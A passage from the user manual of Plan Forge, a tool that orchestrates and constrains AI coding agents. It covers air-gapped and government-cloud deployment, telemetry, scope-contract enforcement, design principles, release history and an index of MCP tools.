| Compliance reviewer agent | .github/agents/compliance-reviewer.agent.md ships out of the box for GDPR/CCPA/SOC2/HIPAA-aware code review |
| Project profile compliance frameworks | .github/prompts/project-profile.prompt.md collects SOC2, HIPAA, PCI-DSS, GDPR, FedRAMP early in setup |
For specific frameworks:
- gpt-5.1, gpt-4.1, o3-mini, gpt-4o)
- .forge/ artifacts are deletable
Plan Forge is architecturally compatible with fully air-gapped deployment. The complete pattern:
- localhost:3100)
- .forge/ artifact storage
| Component | Air-gapped solution |
|---|---|
| LLM inference | Use Foundry Local powered by Azure Local (preview May 2026), Ollama, vLLM, llama.cpp, or similar on-prem inference. Configure as the OpenAI-compatible endpoint Plan Forge talks to. |
| GitHub Enterprise | Use GitHub Enterprise Server (GHES) instead of GitHub.com. Plan Forge supports GHES; Cloud Agent local-MCP-server pattern works |
| Update checks | Set PFORGE_NO_UPDATE_CHECK=1 to disable. Manual updates via pforge self-update --from-local <path> or repo sync from internal mirror |
| OpenBrain L3 memory | Optional; if used, deploy the Postgres+pgvector inside the boundary |
| MCP servers | Self-host any MCP server you want available; point .vscode/mcp.json at internal endpoints only |
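The "internal endpoints only" rule for MCP servers is easy to verify before a machine goes inside the boundary. A sketch, assuming .vscode/mcp.json has a top-level servers object whose HTTP entries carry a url field; the internal host list and the .corp.example suffix are placeholders for your own network.

```python
from urllib.parse import urlparse

def external_mcp_servers(mcp_config,
                         internal_hosts=("localhost", "127.0.0.1"),
                         internal_suffix=".corp.example"):
    """Return the names of MCP servers whose URL host is outside the boundary."""
    offenders = []
    for name, server in mcp_config.get("servers", {}).items():
        url = server.get("url")
        if url is None:
            continue  # command-launched servers run as local processes
        host = urlparse(url).hostname or ""
        if host not in internal_hosts and not host.endswith(internal_suffix):
            offenders.append(name)
    return offenders
```

An empty result means every URL-based server resolves to a host you control; it says nothing about what a locally launched server process itself connects to.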
- pforge ext add --from-local <path> for vetted extensions)
- srnichols/plan-forge updates
- PFORGE_NO_UPDATE_CHECK=1 set
This is the differentiator vs. competitors. Cursor cannot offer this (control plane in AWS even with self-hosted workers). Sourcegraph Amp explicitly cannot (no self-host, no BYOK). GitHub Copilot Cloud Agent runs on GitHub-hosted infrastructure. For air-gapped requirements, Plan Forge is structurally the only viable option in the comparison set.
For customers deploying in Azure Government:
- openai.azure.us (not openai.azure.com)
- login.microsoftonline.us Entra ID (when first-class Entra support lands)
Azure Government has a substantially smaller catalog than commercial Azure:
- gpt-5.1
- gpt-4.1
- gpt-4.1-mini
- o3-mini
- gpt-4o
- text-embedding-3-large, text-embedding-3-small, text-embedding-ada-002
Available in usgovarizona and usgovvirginia, with Data Zone Standard and Provisioned variants.
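With a catalog this small, it helps to check a model list against it before a run rather than discover a missing deployment mid-plan. A minimal sketch using the chat models listed above; the function name is hypothetical, and which models a given preset actually requests is something to read from your own configuration.

```python
GOV_CHAT_MODELS = {"gpt-5.1", "gpt-4.1", "gpt-4.1-mini", "o3-mini", "gpt-4o"}

def unresolved_models(requested_models, catalog=GOV_CHAT_MODELS):
    """Return the requested models that the catalog does not offer, in order."""
    return [model for model in requested_models if model not in catalog]
```

An empty list means every requested model has a counterpart in the gov catalog; anything returned needs a substitute or a fallback.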
- power quorum preset (assumes flagship models like gpt-5.5 or claude-opus-4.7) won't resolve cleanly
- power-gov preset (planned) or graceful fallback
- speed preset works (gpt-4.1-mini exists in gov)
Both global Azure and Azure Government are FedRAMP High. Azure Government adds contractual commitments around US-based data storage and screened-US-persons access. HIPAA and PCI are covered under Azure's standard compliance umbrella for the underlying services; Plan Forge running on top inherits the boundary.
For Azure Government Secret and Top Secret cloud feature availability, contact your Microsoft account team; public documentation is limited.
The Week 2 work in the enterprise hardening track adds first-class OpenTelemetry export. Spec is documented in the enterprise-fleet-readiness research §8.6. Summary:
- gen_ai.* attribute set including token counts (input, output, cache_read, cache_write, reasoning), latency, model, provider
- gen_ai.client.operation.duration histogram, gen_ai.client.token.usage histogram
- gen_ai.client.inference.operation.details with input/output messages (gated by pforge.telemetry.captureContent flag, default off, PII implications)
- pforge.* attributes for plan/slice/run correlation, scope contract IDs, gate names, cost USD (since gen_ai.cost doesn't exist in the spec).
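To make the attribute split concrete, here is a sketch of what one LLM call might carry. The gen_ai.* keys shown are from the OpenTelemetry GenAI semantic conventions; every pforge.* key name below is hypothetical, since the text above names only the namespace, and the content attribute is a simplification of the event-based capture described above.

```python
def span_attributes(model, input_tokens, output_tokens, plan, slice_id, cost_usd,
                    prompt=None, capture_content=False):
    """Build a flat attribute dict for one LLM call."""
    attrs = {
        "gen_ai.request.model": model,
        "gen_ai.usage.input_tokens": input_tokens,
        "gen_ai.usage.output_tokens": output_tokens,
        # Hypothetical pforge.* names, shown only to illustrate correlation fields.
        "pforge.plan": plan,
        "pforge.slice": slice_id,
        "pforge.cost.usd": cost_usd,
    }
    if capture_content and prompt is not None:
        # Content capture is opt-in because prompts may contain PII.
        attrs["pforge.example.prompt"] = prompt
    return attrs
```

Keeping cost under a vendor namespace rather than gen_ai.* avoids colliding with a future standard attribute of the same name.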
Anything that speaks OTLP. Tested compatibility (planned for Week 2):
- gen_ai.* conventions, so Plan Forge runs land in the same dashboards as the customer's Foundry agents)
- pforge.telemetry.captureContent config flag and standard OTel env vars
Wherever you choose to send it via your configured LLM provider. With on-prem inference, nowhere outside your network. Plan Forge itself never transmits source code.
No telemetry is transmitted to Plan Forge maintainers. The optional update check fetches release metadata from GitHub. Disable with PFORGE_NO_UPDATE_CHECK=1.
Yes. Per-run trajectory in .forge/runs/<id>/ includes events, slice artifacts, traces, cost history, and (for CCA-dispatched runs) the full Copilot Cloud Agent trajectory.
Plan Forge enforces scope contracts at the plan level (In Scope, Out of Scope, Forbidden Actions blocks). Pre-tool-use hooks block edits to forbidden paths. Post-execution pforge diff checks for drift.
Honest gap: enforcement is best-effort at the worker level; the orchestrator can't always prevent a bad edit, only detect it. Hardening this is a roadmap item.
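The detect-after-the-fact side of scope enforcement amounts to sorting changed paths against the plan's scope patterns. A sketch of that classification, assuming scope is expressed as glob patterns: the function name is hypothetical, and Python's fnmatch is used for brevity even though its * also matches across directory separators, which stricter glob matchers do not.

```python
from fnmatch import fnmatchcase

def classify_changes(changed_files, in_scope, forbidden):
    """Sort changed paths into forbidden, drift (outside scope), and ok."""
    report = {"forbidden": [], "drift": [], "ok": []}
    for path in changed_files:
        if any(fnmatchcase(path, pattern) for pattern in forbidden):
            report["forbidden"].append(path)  # forbidden wins over in-scope
        elif not any(fnmatchcase(path, pattern) for pattern in in_scope):
            report["drift"].append(path)
        else:
            report["ok"].append(path)
    return report
```

Checking forbidden patterns first means a path that is both in scope and forbidden is still reported as a violation.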
Per-slice workerTimeoutMs cap kills runaway workers. Reflexion retry with backoff handles recoverable failures. forge_alert_triage ranks issues by priority. In-loop stuck detector is on the roadmap (OpenHands-pattern).
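The retry-with-backoff part of this can be sketched in a few lines. This shows only the generic backoff loop, not the Reflexion step of feeding the failure back to the model or the worker timeout; the function name, attempt count, and delays are assumptions.

```python
import time

def run_with_retry(worker, max_attempts=3, base_delay=1.0, sleep=time.sleep):
    """Call `worker` until it succeeds, doubling the wait after each failure."""
    for attempt in range(1, max_attempts + 1):
        try:
            return worker()
        except Exception:
            if attempt == max_attempts:
                raise  # out of retries: surface the last error to the caller
            sleep(base_delay * 2 ** (attempt - 1))
```

Passing sleep as a parameter keeps the loop testable without real waiting.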
.forge.json per repo supports cost.dailyMax and similar caps (planned formalization). Per-engineer attribution is on the roadmap.
Plan Forge does not delete .forge/ artifacts automatically. Retention is the customer's policy; implement it via standard filesystem tools or post-run cleanup hooks.
Plan Forge does not cache LLM responses. Some LLM providers (Anthropic, OpenAI) do prompt caching; that's their infrastructure, billed at reduced rates. Plan Forge tracks cache hit/miss for cost accuracy (Phase-COST-TOKEN-COVERAGE landed the per-vendor billing math).
Open source. MIT license. Audit the code. Plan Forge is dogfooded against itself: every release ships through the same Plan Forge pipeline that customers use. Self-repair tooling (forge_meta_bug_file) gives agents a way to file defects against Plan Forge during execution.

Seven principles behind Plan Forge's architecture, what each one prevents, where it is enforced.
When to read this chapter: reviewing why Plan Forge enforces what it enforces, onboarding to the architecture, or evaluating whether a proposed change conflicts with a foundational principle.
Reference adaptation of the marketing essay I Built Guardrails for AI Coding Agents — Here's What I Learned (April 2026). The blog tells the story; this chapter captures the principles.
Principle: Define what should not be built, not just what should. Explicit prohibitions cut scope drift by, to quote the source, "an order of magnitude" (guardrails-lessons-learned blog).
Failure mode it addresses: An agent asked to "build a login page" produces a login page plus a password reset flow, an admin panel, a user profile system, and refactored database migrations. The agent is not being creative; it is being thorough with zero scope constraints.
Where it is enforced: Every hardened plan ships a Forbidden Actions section in the Scope Contract. The PreToolUse lifecycle hook (see How It Works → Building Blocks) blocks file edits to paths listed in the active plan's Forbidden Actions. The pattern is enforced by the plan-hardening prompt, not left to the executing agent's discretion.
"The most powerful guardrail isn't 'do this.' It's 'don't do that.'"
Principle: Guardrails that require manual activation are guardrails that go unused. File-pattern-scoped auto-loading drives compliance from optional to default.
Failure mode it addresses: Early Plan Forge required developers to manually attach instruction files to each chat session. Adoption sat at roughly 20%, "whoever remembered." After the breakthrough of applyTo frontmatter, adoption climbed to 100% because activation became automatic on file edits.
Where it is enforced: Each instruction file in .github/instructions/ declares which file patterns it cares about via YAML frontmatter:
---
description: Security guardrails for auth and middleware
applyTo: '**/auth/**,**/middleware/**'
---
When a file matching the pattern is edited, the instruction file loads automatically into the agent's context. See Customization → Custom Instructions for the full pattern reference.
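The matching step can be illustrated by parsing the applyTo value from the frontmatter above and testing an edited path against it. This is a sketch of the idea, not the editor's matcher: both function names are hypothetical, and Python's fnmatch treats * more loosely than a true glob engine (it also matches across directory separators).

```python
from fnmatch import fnmatchcase

def parse_apply_to(frontmatter):
    """Extract the comma-separated applyTo patterns from a frontmatter block."""
    for line in frontmatter.splitlines():
        key, _, value = line.partition(":")
        if key.strip() == "applyTo":
            raw = value.strip().strip("'\"")
            return [p.strip() for p in raw.split(",") if p.strip()]
    return []

def applies_to(path, patterns):
    """True when a repo-relative path matches any pattern."""
    # The "/" + path form lets a leading "**/" also match at the repo root.
    return any(fnmatchcase(path, p) or fnmatchcase("/" + path, p) for p in patterns)
```

With the frontmatter shown above, src/auth/login.ts and middleware/cors.ts both trigger the security instructions, while src/api/users.ts does not.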
Principle: The session that wrote the code cannot evaluate it objectively. Sunk-cost bias is a property of the context window, not the model. A fresh review session catches what the build session is structurally unable to see.
Failure mode it addresses: In a single long chat session, the agent that wrote the code will always believe its code is correct. The blind spots that produced the bug live in the same token sequence as the proposed fix. Self-review fails silently: the agent gives itself a passing grade and moves on.
Where it is enforced: Plan Forge mandates session isolation. Builder works in Session 2; reviewer works in Session 3 with fresh context, the same guardrails, and independent judgment. See How It Works → Why Session Isolation Works for the deeper psychological breakdown, and How It Works → The 4-Session Model for the structural reference.
The analogy from the source essay: would a developer be allowed to merge their own PR without review? Same question, same answer for AI agents.
Principle: Testing "at the end" does not work. Failures cascade across files faster than the agent can debug them. Validation must happen at every slice boundary: the agent cannot proceed to slice N+1 until slice N passes its gate.
Failure mode it addresses: Building 15 files before running tests guarantees that failures compound. The agent burns its context window chasing regressions that span files it has long since stopped reasoning about.
Where it is enforced: Every hardened plan decomposes a feature into 3–7 execution slices, each with its own Validation Gate. The orchestrator runs the gate after each slice and refuses to advance on failure. See Writing Plans → Slicing Strategy for the slice contract and How It Works → Building Blocks for the gate enforcement model.
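The control flow behind "refuses to advance on failure" is a loop that stops at the first failed gate. A minimal sketch, assuming slices run strictly in order: run_plan, execute, and gate are hypothetical names standing in for the orchestrator, the worker, and the Validation Gate.

```python
def run_plan(slices, execute, gate):
    """Run slices in order; stop at the first slice whose gate fails."""
    completed = []
    for name in slices:
        execute(name)
        if not gate(name):
            # Later slices are never started, so failures cannot compound.
            return {"completed": completed, "failed_at": name}
        completed.append(name)
    return {"completed": completed, "failed_at": None}
```

Because the loop returns on the first failure, the state at that point is exactly one slice beyond the last known-good gate.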
Slice gates produce three observable benefits:
Principle: One concern per file. Each file under ~150 lines. Auto-loaded only when relevant. Long monolithic instruction documents process worse than short focused ones; agents cherry-pick what's convenient and ignore the rest.
Failure mode it addresses: The first version of Plan Forge had a single copilot-instructions.md at roughly 2,000 lines covering security, testing, architecture, database patterns, error handling, and deployment. Key rules were buried, contradictions crept in, and the agent applied rules selectively.
Where it is enforced: The .github/instructions/ directory contains 18+ focused files, each with a single concern. See Customization → Custom Instructions for the inventory.
v2.18 extension: Temper Guards and Warning Signs: Each instruction file now ends with two named sections. Temper Guards documents the specific shortcuts agents take that produce compiling but architecturally broken code (e.g. "this is just a DTO, no logic to test", "N+1 won't matter at our scale"); Warning Signs lists observable anti-patterns that reviewers can grep for. Each file teaches not just what to do but why not to skip it.
Principle: Every stack has different conventions. Guardrails that say "use PascalCase" to a Python developer get the entire system distrusted. Stack-aware presets eliminate the customization tax.
Failure mode it addresses: A stack-agnostic guardrail document either contradicts the project's conventions in places (loss of trust) or stays so generic that it fails to enforce anything specific (loss of value). The middle ground does not exist.
Where it is enforced: Nine first-party presets ship with Plan Forge (.NET, TypeScript, Python, Java, Go, Swift, Rust, PHP, and Azure IaC), selectable via setup.ps1 -Preset <name> at install time. Multi-preset combinations are supported (e.g. -Preset typescript,azure-iac) for full-stack projects. See Stack-Specific Notes for what each preset adjusts.
Principle: Treating quality as optional ("add tests later", "we'll refactor", "security can wait") guarantees that the optional steps never happen. Quality must be structural: the path of least resistance must produce tested, validated, architecturally compliant code.
Failure mode it addresses: Every "we'll fix it later" trains the next agent session to copy the same shortcut. The codebase accumulates technical debt that nobody is responsible for paying down.
Where it is enforced: Hardened plans include test expectations per slice. Architecture guardrails load on every file change. Security guardrails load on every auth file. Testing guardrails load on every test file. There is no "opt in to quality" path; bypassing the defaults requires actively working around them.
v2.19 extension: Exit Proof: Every skill now ends with a verifiable checklist: not "it seems right" but "paste the test output, show the migration file, prove coverage didn't drop." Evidence over assumption. See Customization → Skills for the Exit Proof contract.
"The best developer tools don't make quality easier. They make it unavoidable."
📄 Reference adaptation of guardrails-lessons-learned.html. Reference voice; first-person voice preserved only inside cited blockquotes.

Eleven inflection points from v1.0 (Summer 2025) to v3.6 (May 2026). Each one solved a specific problem the previous version exposed.
When to read this chapter: understanding why a feature exists, evaluating whether a design constraint is foundational or contingent, or onboarding to the architecture's history.
Reference adaptation of the marketing essay From Impossible to 7 Minutes — A Year of Building AI Coding Guardrails (April 2026), extended through v3.6 from the CHANGELOG.
What shipped: 18 specialized instruction files, prompt templates, and the 4-session pipeline (Specify → Plan → Execute → Review). Plan Forge at this point was "files you install": a guardrail collection that lived in the project's .github/ directory.
Inflection point: The breakthrough was not the file count. It was discovering that session isolation works: the builder cannot review its own work, but a separate session with fresh context catches blind spots reliably. This insight made consistent quality possible and became the foundation everything else built on. See How It Works → Why Session Isolation Works and Lessons Learned → Lesson 3.
What it solved: Single-session AI work had a quality ceiling: agents would believe their own bad code was correct because the bad code lived in the same context window as the proposed fix.
What shipped: DAG-based execution engine with CLI worker spawning, 17 MCP tools (forge_run_plan, forge_analyze, forge_diagnose, forge_cost_report, etc.), the pforge CLI, and the dashboard with live progress / cost aggregation / session replay.
Inflection point: Plan Forge stopped being "files you install" and became "a system that runs." The MCP server gave it a programmatic API; the dashboard gave it visibility; the orchestrator made full plan execution possible without human intervention between slices.
What it solved: Hardened plans existed in v1.0 but a human had to drive each slice. Long features required hours of supervised execution. The orchestrator removed the supervision tax for everything except gate failures.
What shipped: Multi-model consensus analysis. Three models analyze the same slice independently; a reviewer model synthesizes their findings into a unified report. See Advanced Execution → Quorum Mode for current mechanics.
Inflection point: Single-model execution was hitting its limits. Claude excelled at architecture; GPT at breadth; Grok brought a different analytical lens. Each model had blind spots, and those blind spots were consistent. Treating AI code analysis as a consensus process, the way human code review works, produced 20% more test recommendations than any single model alone (per quorum A/B test).
What it solved: Quality plateau on complex slices. One model's blind spot is another model's strength.
What shipped: Cross-platform notification fan-out (Telegram, Slack, Discord, Microsoft Teams, PagerDuty, OpenClaw) with inline approval / reject flows for events that need a human. See Remote Bridge.
Inflection point: Plan Forge runs inside the IDE, but some decisions are not IDE-shaped. A reviewer flags drift at 2 AM. A quorum tie needs a human tiebreaker. An incident fires after the laptop closes. The bridge made the forge able to reach you instead of waiting for you to come back.
What it solved: The "I missed the notification" failure mode that blocked autonomous execution overnight or away from the desk.
What shipped: A native VS Code experience with skills, agents, Plan Forge lifecycle hooks (PreDeploy, PreCommit, PreAgentHandoff, PostSlice, configured via .github/hooks/plan-forge.json), and instruction auto-loading via applyTo frontmatter. (These are not Claude Code's SessionStart / PreToolUse / PostToolUse / Stop hooks; the trigger semantics differ. See Installation for the mapping.) See Multi-Agent → Copilot.
Inflection point: Auto-loading turned guardrail adoption from optional ("whoever remembered") to default ("it just works"). The applyTo pattern moved compliance from roughly 20% to 100%. See Lessons Learned → Lesson 2.
What it solved: Manual instruction-file attachment was a dead pattern. Lifecycle hooks gave Plan Forge the ability to enforce rules at file-edit time rather than relying on the agent to remember to load them.
What shipped: Each instruction file gained two new sections: Temper Guards, documenting the specific shortcuts agents take that produce compiling but architecturally broken code, and Warning Signs, listing observable anti-patterns reviewers can grep for. A Context Fuel instruction file taught agents to manage their own context budgets.
Inflection point: Agent-skills analysis revealed a class of failure that previous guardrails missed: the model would write code that compiled, passed tests, and looked plausible while violating an architectural principle nobody had thought to forbid explicitly. Temper Guards captured these as named anti-patterns; Warning Signs gave reviewers a way to detect them.
What it solved: The "looks correct, is structurally wrong" failure mode. Compiling code is not architecturally compliant code.
What shipped: Host-aware model routing (subscription-vs-API billing surface awareness), the forge_estimate_quorum tool for tool-backed cost projection across all four quorum modes, and the documented complexity scoring rubric (scoreSliceComplexity()) with seven weighted signals. See Host-Aware Routing and Estimating Quorum Cost.
Inflection point: Quorum cost was previously hand-computed by agents and was observed to overshoot reality by an order of magnitude. The estimator tool replaced chat math with measured projection. Host-aware routing fixed the silent-double-pay failure mode where gpt-* models on Claude Code or Cursor would bill the user's pay-per-token API instead of their existing subscription.
What it solved: Cost surprise. Both the quorum overhead surprise (estimator) and the host billing surprise (routing).
What shipped: Phase Lattice introduced tree-sitter-based code chunking, code-graph indexing, and the forge_lattice_* tool family (index, query, callers, blast, stat). Anvil caching for cost-effective re-indexing. Hallmark provenance tracking on every chunk. v3.5.1 added camelCase-aware relevance ranking via scoreChunk() / tokenizeForSearch().
Inflection point: Plan Forge could now reason about the user's actual codebase architecture, not just plans and instructions. Searching getUserById returns the function, its callers, and its blast radius across the repository. This made auto-generated plans architecture-aware: a slice that touches a hub function gets flagged as high-blast-radius before execution.
What it solved: Plans that looked safe in isolation but rippled unexpectedly. Pre-Lattice, the agent had to grep its way to architectural awareness slice by slice.
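The blast-radius idea can be sketched as a depth-bounded breadth-first traversal over caller edges. This is an illustrative sketch only, not the forge_lattice_blast implementation: the CallerGraph shape, the blastRadius name, and the sample symbols other than getUserById are assumptions made for the example.

```typescript
// Hypothetical graph shape: symbol name -> symbols that call it.
type CallerGraph = Map<string, string[]>;

// Depth-bounded breadth-first traversal from a seed symbol over caller edges.
// Returns every symbol reached, mapped to its distance from the seed.
function blastRadius(graph: CallerGraph, seed: string, maxDepth: number): Map<string, number> {
  const distance = new Map<string, number>([[seed, 0]]);
  let frontier: string[] = [seed];
  for (let depth = 1; depth <= maxDepth && frontier.length > 0; depth++) {
    const next: string[] = [];
    for (const symbol of frontier) {
      for (const caller of graph.get(symbol) ?? []) {
        if (!distance.has(caller)) {
          distance.set(caller, depth); // first visit is the shortest distance
          next.push(caller);
        }
      }
    }
    frontier = next;
  }
  return distance;
}

// Illustrative data only.
const graph: CallerGraph = new Map<string, string[]>([
  ["getUserById", ["loadProfile", "authorize"]],
  ["loadProfile", ["renderDashboard"]],
  ["authorize", ["renderDashboard", "handleLogin"]],
]);
const reached = blastRadius(graph, "getUserById", 2);
```

A slice that touches a symbol whose reached set is large would be the kind of change the text describes as high-blast-radius; where to draw that threshold is left open here.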
What shipped: Three sync surfaces, completed in three consecutive releases. pforge sync-spaces (v2.98) generates Copilot Spaces from forge plans and principles. forge_sync_memories (v2.99) writes .github/copilot-memory-hints.md from cross-tool memory. forge_sync_instructions (v3.0) generates .github/copilot-instructions.md from project profile, project principles, extra instruction files, and .forge.json config.
Inflection point: Copilot became a first-class citizen of the Plan Forge ecosystem, not just one of several agent surfaces. Every Copilot conversation now opens with project-specific guidance auto-loaded by the platform: no manual setup, no forgotten attachments. This collapsed the onboarding gap for the largest installed base of any AI coding agent.
What it solved: Copilot users were getting generic guidance because copilot-instructions.md was hand-written or absent. The sync trilogy made the file always up to date and always reflective of the actual project's profile, principles, and configuration.
What shipped: Three releases focused on multi-developer awareness. v3.2 added .forge/team-activity.jsonl (shared run log), the forge_team_activity MCP tool, and pforge team activity. v3.3 added pforge github review delegate: when a slice produces a PR, an issue assigned to @copilot is filed with a structured review checklist, and the Copilot Coding Agent posts findings back on the PR. v3.4 added the Team tab in the dashboard with per-operator cards, success rates, costs, and a conflict-risk banner.
Inflection point: Plan Forge stopped being a solo tool. Teams running parallel plan executions against the same repository could now see who was working on what, get reviewer attention from the Copilot Coding Agent without a human handoff, and detect coordination risk before two developers stepped on each other's slices.
What it solved: The "two of us hit the same file" failure mode. And the "I shipped a PR but nobody reviewed it" failure mode.
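One way to picture the conflict-risk check is as a scan of a JSONL run log for files touched by more than one operator. The sketch below assumes a record shape of { operator, files }, which is hypothetical; the real .forge/team-activity.jsonl fields may differ, and this is not how the dashboard banner is computed.

```typescript
// Hypothetical record shape; the real team-activity.jsonl fields may differ.
interface RunRecord {
  operator: string;
  files: string[];
}

// Parse JSONL text: one JSON object per non-empty line.
function parseJsonl(text: string): RunRecord[] {
  return text
    .split("\n")
    .map((line) => line.trim())
    .filter((line) => line.length > 0)
    .map((line) => JSON.parse(line) as RunRecord);
}

// Files touched by more than one operator, with the operators involved.
function findConflicts(records: RunRecord[]): Map<string, string[]> {
  const byFile = new Map<string, Set<string>>();
  for (const record of records) {
    for (const file of record.files) {
      const operators = byFile.get(file) ?? new Set<string>();
      operators.add(record.operator);
      byFile.set(file, operators);
    }
  }
  const conflicts = new Map<string, string[]>();
  byFile.forEach((operators, file) => {
    if (operators.size > 1) conflicts.set(file, Array.from(operators).sort());
  });
  return conflicts;
}

// Illustrative log content only.
const sampleLog = [
  '{"operator":"ana","files":["src/api.ts","src/db.ts"]}',
  '{"operator":"ben","files":["src/db.ts"]}',
].join("\n");
const conflicts = findConflicts(parseJsonl(sampleLog));
```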
What shipped: OpenBrain, the optional cross-session semantic memory backend, was reframed from a row-5 "optional extension" to the L3 memory layer, with a clear on-ramp at every install touchpoint. pforge smith now always reports L3 status. setup.ps1 / setup.sh prompt for OpenBrain install at the end of the flow (auto-suppressed in CI). New pforge brain {status, hint, test, replay} subcommands were added. The README gained a numbered Step 3, "Enable Persistent Memory", with four deploy options. The if (openBrainConfigured) gating did not change; Plan Forge still works perfectly without it. See Memory Architecture on GitHub.
Inflection point: OpenBrain hooks were already wired into 28 MCP tools, 4 search-before-acting prompts, Reflexion lessons, Auto-skills, and cross-project Federation, but every one was gated and silently no-op'd otherwise. Users who didn't know to install OpenBrain were getting Plan Forge's L1 (Hub events) plus L2 (.forge/*.jsonl durable files) memory but no persistent semantic memory across sessions. The inner loop that makes the agent improve over time was effectively dark. v3.6 made the L3 layer discoverable without changing any soft-fail behavior.
What it solved: The "Plan Forge isn't getting smarter over time" failure mode. Without L3, Reflexion lessons, Auto-skills, and postmortem learnings had nowhere durable to live across sessions.
📄 Reference adaptation of the-journey-from-impossible-to-seven-minutes.html. The original essay covered v1.0 through v2.18 (April 2026). v2.83 and the v2.95 → v3.6 May 2026 sprint were added from CHANGELOG.md as they shipped.
A–Z topic index, every concept, tool, and named section across the manual with a direct link to the page that covers it.
Generated by node docs/manual/maintain.mjs from the chapter list and curated section index in assets/manual.js. To add a new entry, add it to the relevant page and re-run the script. See also the Glossary for definitions of core terms.
Every numbered figure in the manual, in chapter order. Click a row to jump to the diagram in its original chapter.
Generated by node docs/manual/maintain.mjs from every <figure class="manual-figure"> in a numbered chapter. Figure numbers (Figure 5-1) are assigned in document order within each chapter. Sub-chapters and deep dives don't carry figure numbers; their diagrams still appear inline with captions but are not enumerated here.
One index, four surfaces. All 104 MCP tools, all 97 CLI commands, every REST endpoint domain, and every SDK export: alphabetized, grouped, and cross-linked. If you can't remember whether forge_secret_scan has a CLI wrapper, this is the page.
Plan Forge exposes its capabilities through four orthogonal transports. The same handler set backs all four; choosing one is a question of who is calling.
| Surface | Count | Auth | Best for |
|---|---|---|---|
| MCP (stdio + WebSocket) | 104 tools | Transport-bound (stdio = inherited trust; WS = bearer) | Copilot, Claude, Cursor, Codex, anything speaking MCP |
| CLI (pforge) | 97 commands | Local filesystem trust + PFORGE_API_TOKEN | Scripts, cron, humans in terminals, CI runners |
| REST (/api/*) | 103 endpoints across 17+ domains | Bearer token in Authorization header | HTTP clients, CI, dashboards, mobile, anything cross-process |
| SDK (pforge-sdk) | 12 sub-paths | Bearer token via createClient | Node.js / TypeScript callers wanting typed responses |
WebSocket events on /api/hub are the fifth, observation-only surface; see Chapter 29 · Integrating from Outside. The full payload schema for every hub event is in Appendix V · Event Catalog.
Canonical source: pforge-mcp/tools.json. The full description, input schema, error map, and example for each tool is exposed via forge_capabilities. The table below is the one-line index.
| Tool | Purpose |
|---|---|
| forge_smith | Inspect the forge, env, VS Code, setup health, version currency, common problems |
| forge_validate | Validate Plan Forge setup, required files, counts, unresolved placeholders |
| forge_status | All phases from DEPLOYMENT-ROADMAP.md with current status |
| forge_diff | Compare changes against a plan's Scope Contract, drift + forbidden edits |
| forge_sweep | Completeness sweep, scan for TODO/FIXME/HACK/stub/placeholder/mock markers |
| forge_audit_export | Export audit events from .forge/runs/*/events.log (ACI-paginated, filterable by date/type/run) |
| forge_diff_stats | Classify staged git diff changes by category (plan, test, docs, config, chore, scope); advisory only, never blocks |
| forge_github_status | Inspect the GitHub-native AI surface (instructions, agents, MCP wiring, workflows, gh CLI) |
| forge_github_metrics | Live GitHub repo metrics via gh CLI, stars, PRs, issues, commit activity |
| forge_delegate_review | Delegate PR review to the Copilot Coding Agent (cloud) |
| forge_team_dashboard | Multi-developer coordination, per-developer cards + conflict-risk assessment |
| forge_team_activity | Read recent run summaries from .forge/team-activity.jsonl |
| forge_new_phase | Create a new phase plan + roadmap entry |
| forge_analyze | Cross-artifact analysis, traceability, coverage, scope, validation gates |
| forge_run_plan | Execute a hardened plan, spawn workers, validate at every boundary, track tokens |
| forge_abort | Abort the currently running plan execution |
| forge_plan_status | Status of the latest plan execution run |
| forge_regression_guard | Run gate commands from plan files against the current codebase |
| forge_export_plan | Convert a Copilot cloud agent session plan into a hardened Phase-X-PLAN.md |
| forge_pipelines_list | List the four standing capture pipelines and report their last-write timestamps plus Anvil hit rates |
| forge_cost_report | Total spend, per-model breakdown, monthly aggregation from cost-history.json |
| forge_estimate_quorum | Projected plan cost under all four quorum modes (auto/power/speed/false) |
| forge_estimate_slice | Projected cost for a single slice under a chosen quorum mode |
| forge_quorum_analyze | Assemble a structured 3-section quorum prompt from any LiveGuard data source |
| forge_doctor_quorum | Preflight viability check, probe all preset models, report availability + fallbacks |
| forge_crucible_submit | Submit a raw idea, start a new smelt |
| forge_crucible_ask | Advance the interview, supply an answer, get the next question |
| forge_crucible_preview | Render the current draft as a Markdown plan |
| forge_crucible_finalize | Atomically claim a phase number, write Phase-NN.md, stamp crucibleId: |
| forge_crucible_list | List smelts (newest first), optionally filtered by status |
| forge_crucible_abandon | Abandon a smelt, release any phase-number claim |
| forge_crucible_import | Import a Spec Kit project, deterministic, LLM-free field mapping |
| forge_crucible_status | List smelts by source and status, or inspect a single smelt |
| forge_tempering_scan | Read-only scan of an existing coverage report (lcov/cobertura/jacoco/cover.out/...) |
| forge_tempering_status | Latest N scan summaries, dashboard feed + forge_smith panel |
| forge_tempering_run | Execution harness, runs unit/integration/UI/API scanners per stack preset |
| forge_tempering_approve_baseline | Promote current screenshot to visual-diff baseline |
| forge_tempering_drain | Round-loop wrapper, re-probe until convergence or max-rounds cap |
| forge_triage_route | Route a tempering finding into bug / spec / classifier lane |
| forge_classifier_issue | File a GitHub issue proposing a classifier rule update (closes the audit loop) |
| forge_bug_register | Register a bug discovered by a tempering scanner |
| forge_bug_list | List bugs with optional filters |
| forge_bug_update_status | Transition status (open → in-fix → fixed) with validation |
| forge_bug_validate_fix | Re-run the scanner that discovered a bug to verify the fix |
| forge_memory_capture | Capture a thought, decision, or lesson into OpenBrain persistent memory |
| forge_memory_report | Aggregate health of every memory surface (L2 jsonl, OpenBrain queue, search cache, orphans) |
| forge_sync_memories | Generate .github/copilot-memory-hints.md from trajectories + auto-skills + brain |
| forge_brain_replay | Bulk-load records into OpenBrain via capture_thought from a local source file |
| forge_brain_test | Round-trip test against OpenBrain (L3 memory): write a test thought and read it back |
| forge_hallmark_show | Show Hallmark provenance records: immutable milestone stamps written at slice completions, gate passes, phase closures |
| forge_hallmark_verify | Verify a Hallmark record has not drifted: re-hashes the referenced source file and compares against the stored hash |
| forge_sync_instructions | Generate .github/copilot-instructions.md from profile + principles + .forge.json |
| forge_lattice_index | Build/update the code-graph index, chunks tracked files, persists JSONL |
| forge_lattice_stat | Bounded summary, chunk count, edge count, language dist, Anvil hit rate |
| forge_lattice_query | Search chunks by name, language, kind, or file path |
| forge_lattice_callers | Find all chunks that reference a given symbol |
| forge_lattice_blast | BFS traversal, expand callees/callers from a seed chunk up to depth N |
| forge_graph_query | Query the in-memory knowledge graph (Phase/Slice/Commit/File/Run/Bug nodes) |
| forge_patterns_list | List recurring patterns detected across runs (4 detectors) |
